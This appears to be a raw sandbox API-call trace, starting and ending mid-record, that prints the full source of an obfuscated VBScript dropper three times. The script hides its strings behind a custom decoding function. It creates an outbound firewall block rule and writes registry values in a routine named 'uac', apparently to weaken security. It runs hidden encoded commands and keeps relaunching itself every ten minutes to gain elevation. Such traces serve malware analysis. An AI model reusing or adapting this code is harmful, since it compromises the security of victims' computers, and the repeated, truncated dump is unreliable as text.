dwPlatformId=0x6dae4268, szCSDVersion="\x90Ø%") | out: lpVersionInformation=0x25d870*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.272] GetProcessWindowStation () returned 0x2c [0226.272] GetUserObjectInformationA (in: hObj=0x2c, nIndex=1, pvInfo=0x25d860, nLength=0xc, lpnLengthNeeded=0x25d86c | out: pvInfo=0x25d860, lpnLengthNeeded=0x25d86c) returned 1 [0226.273] DllGetClassObject (in: rclsid=0x3b7d78*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x76adee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25dfd4 | out: ppv=0x25dfd4*=0x2a2848) returned 0x0 [0226.274] IClassFactory:CreateInstance (in: This=0x2a2848, pUnkOuter=0x0, riid=0x25e980*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x25dfc0 | out: ppvObject=0x25dfc0*=0x1876e68) returned 0x0 [0226.274] GetSystemInfo (in: lpSystemInfo=0x25df00 | out: lpSystemInfo=0x25df00*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0226.274] VirtualQuery (in: lpAddress=0x25df40, lpBuffer=0x25df24, dwLength=0x1c | out: lpBuffer=0x25df24*(BaseAddress=0x25d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0226.275] IUnknown:AddRef (This=0x1876e68) returned 0x2 [0226.275] IUnknown:Release (This=0x1876e68) returned 0x1 [0226.275] IUnknown:Release (This=0x2a2848) returned 0x0 [0226.275] IUnknown:QueryInterface (in: This=0x1876e68, riid=0x6db11d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x25ecb4 | out: ppvObject=0x25ecb4*=0x1876e68) returned 0x0 [0226.275] IUnknown:Release (This=0x1876e68) returned 0x1 [0226.275] _strnicmp (_Str1=" 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _MaxCount=0x5) returned -1 [0226.275] IsTextUnicode (in: lpv=0x2a3660, iSize=4199, lpiResult=0x25ec7c | out: lpiResult=0x25ec7c) returned 0 [0226.275] GetACP () returned 0x4e4 [0226.275] GetACP () returned 0x4e4 [0226.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2a3660, cbMultiByte=4199, lpWideCharStr=0x2a8478, cchWideChar=4327 | out: lpWideCharStr="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n") returned 4199 [0226.276] CoUninitialize () [0226.277] CloseHandle (hObject=0x130) returned 1 [0226.277] wcsncmp (_String1="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.277] wcsncmp (_String1="n Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 